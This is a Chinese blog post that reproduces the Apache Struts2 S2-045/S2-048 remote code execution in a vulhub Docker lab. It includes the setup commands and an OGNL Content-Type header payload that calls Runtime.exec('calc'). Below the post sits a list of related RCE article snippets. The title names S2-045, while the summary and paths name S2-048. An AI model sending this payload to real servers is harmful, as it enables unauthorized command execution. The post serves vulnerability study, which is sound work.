S2-045（RCE远程代码执行）

最新推荐文章于 2025-06-18 17:35:55 发布

原创最新推荐文章于 2025-06-18 17:35:55 发布 · 745 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#S2-045

漏洞复现专栏收录该内容

41 篇文章

订阅专栏

本文详细介绍了如何搭建Struts2 S2-048漏洞环境，通过使用Docker启动漏洞服务，并利用特定Payload进行攻击演示，成功在服务器端触发计算器弹出，展示了漏洞复现的全过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

环境搭建：
https://blog.youkuaiyun.com/qq_36374896/article/details/84145020

漏洞复现

进入漏洞环境（048和045一样）

cd vulhub-master/struts2/s2-048/

在这里插入图片描述

启动s2-048环境：

sudo docker-compose up

在这里插入图片描述

Payload

Content-Type:~multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('calc')};

使用burp抓取访问包：
在这里插入图片描述
将其改为POST方法，并将Payload写入HTTP头部，下方随意加入一些POST的数据

服务器端已经弹出了计算器：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

浅笑⁹⁹⁶

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

RCE(remote command/code execute)-远程命令执行

田田云逸的博客

04-28

361

RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。

【漏洞复现】Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞

李同學的安全圈

04-15

3741

文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复声明本篇文章仅用于技术研究和漏洞复现，切勿从事非法渗透，造成任何影响与本作者无关，切记！前言 Apache 官方发布了 Apache Struts2 的风险通告，漏洞编号为 CVE-2021-31805，可能会导致远程代码执行。一、漏洞描述此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整，导致输入验证不正确。如果开发人员使用%{…}

参与评论您还未登录，请先登录后发表或查看评论

Struts2远程代码执行漏洞S2-045利用及修复

u014416842的博客

04-13

4287

升级到struts-2.3.32, 发现无法调用getter方法public class Action { private Map yTypeList = new LinkedHashMap(); // getYtypeList public Map getYTypeList() { yTypeList.put("a", "invalid yTypeList a");

RCE: 远程命令执行

h1008685的博客

07-23

687

原理，实例，dvwa源码分析

网络安全-渗透测试-RCE远程代码执行漏洞详解—命令执行、代码执行！

最新发布

qq_41314882的博客

06-18

1130

RCE（远程代码执行漏洞）是一种高危安全漏洞，允许攻击者远程执行恶意代码或命令，从而控制目标系统。该漏洞通常因应用程序验证不足、权限提升或安全更新问题导致，常见于调用系统命令的函数（如PHP中的exec、system等）。攻击者可利用操作系统特殊符号拼接命令，如Windows的"|"或"&"实现命令注入。命令执行漏洞是RCE的子集，主要通过系统函数调用实现。防御需严格过滤用户输入，避免直接拼接系统命令。本文还介绍了PHP中常见的命令执行函数及其利用方式。

RCE(Remote Command/Code Execute；远程命令/代码执行)

今天的风儿甚是喧嚣

07-08

904

RCE介绍及绕过

2024.3.28日报（RCE远程命令执行）

2302_80946742的博客

03-28

1204

命令执行（Remote Code Execution, RCE）是网络安全中的一种安全漏洞，它允许攻击者在目标系统上远程执行任意代码。这通常是由于应用程序或系统的输入验证不足，或者不安全地处理外部数据造成的。当攻击者能够利用RCE漏洞时，他们可以完全控制受影响的系统，执行各种恶意活动，如数据窃取、系统破坏或者作为跳板攻击其他系统。RCE漏洞可能存在于多种类型的软件中，包括Web应用程序、操作系统、网络设备等。识别漏洞：攻击者首先需要找到一个可以被利用的RCE漏洞。

Struts2 S2-061 远程命令执行漏洞（CVE-2020-17530）

qq_68163788的博客

06-25

688

Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了API，鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心，吸收了Struts框架的部分优点，提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046（CVE-2017-5638）

qq_51577576的博客

11-20

1044

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046（CVE-2017-5638） Apache Struts2存在远程代码执行漏洞，攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段，通过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常，进而导致任意代码执行。

复现S2-052远程代码执行漏洞

weixin_67813445的博客

03-28

381

Apache Struts 2被曝存在远程命令执行漏洞，漏洞编号S2-052，CVE编号CVE-2017-9805。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。

struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)

03-09

S2-045漏洞是一个严重的远程代码执行（RCE）漏洞，存在于Apache Struts2的OGNL表达式语言中。这个漏洞允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码，对系统安全构成极大威胁。Struts2.3.32的发布就是...

pikachu—RCE（远程命令、代码执行）

weixin_50342860的博客

06-16

899

文章目录RCE漏洞概述远程系统命令执行漏洞产生的原因：实验测试远程代码执行实验测试命令执行和代码执行的区别 RCE漏洞概述可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。远程系统命令执行命令执行漏洞（Command Execution）即黑客可以直接在Web应用中执行系统命令，从而获取敏感信息或者拿下shell权限更常见的命令执行漏洞是发生在各种Web组件，包括Web容器、Web框架、CMS软件、安全组件等漏洞产生的原因： 1. 由于开发人员编写源码，没有针对代码中可执

RCE远程命令执行学习

Goodric的博客

02-14

2344

RCE(remote command/code execute ，远程命令执行) 命令执行一般发生在远程，故被称为远程命令执行。 RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。应用系统从设计上需要给用户提供指定的远程命令操作的接口。（比如常见的路由器、防火墙、入侵检测等设备的web管理界面上）一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。如果设计者在此输入界面的功能

RCE漏洞（远程命令执行）

NSQ0207的博客

07-27

762

RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。

No.27 笔记 | RCE远程命令执行基础

聚焦网络安全，以多元语言优势汲取知识，分享生动有趣的学习与技术心得。

12-23

1093

RCE指攻击者可以通过远程方式在目标系统上执行恶意代码的漏洞或攻击技术，范围广泛，包括代码执行、文件包含、反序列化、命令执行、写文件Getshell等情况。免费开源、快速简单的面向对象轻量级PHP开发框架，用于敏捷WEB应用和企业应用开发。核心版本有ThinkPHP 2系列、3系列、5系列、6系列，其中ThinkPHP 5系列使用较多，ThinkPHP 3系列历史用户较多，ThinkPHP 2和3系列已停止维护。apache项目下的web框架，广泛应用于互联网、政府、企业门户网站。

黑客=高材生？99%的黑客都没学过计算机

m0_71746416的博客

04-21

1725

黑客都是高学历吗？

RCE（远程代码/命令执行漏洞）

qq_55894976的博客

04-01

250

黑盒测试：1,漏扫工具 2,公开漏洞 3,手工有参数及功能点（例如url中有echo id=这样的就可以考虑代码执行,但是假设是echo `$get[a]`的话就要考虑是命令执行，因为``在linux中会先执行``里面的语句，再执行外面的语句，get[a]中a输入ls,那么会执行ls的语句，再将ls执行的语句进行一个echo的输出。假设在x处输入ipconfig,system()函数的作用是执行外部程序并显示输出资料，会执行cmd程序的代码，那么输入ipconfig就会显示出ip的一些信息。

RCE（远程命令执行）漏洞详解

sev1n的博客

04-02

3948

RCE(remote command/code execute，远程命令执行)漏洞远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的，包括部署额外的恶意软件或窃取敏感数据。

vulhub-S2-045 远程代码执行漏洞（CVE-2017-5638）

m0_58265086的博客

09-09

329

7.经过上述步骤说明存在RCE漏洞，在Content-type 那里输入下述代码，获得目标信息。(img-r2CRZuMV-1694240577132)]6.在repeater模块修改数据包，验证是否存在RCE 漏。5.将bp中的数据包发送到的repeter。8.出现root则表示执行成功。9/出现ip表示执行成功。9/出现ip表示执行成功。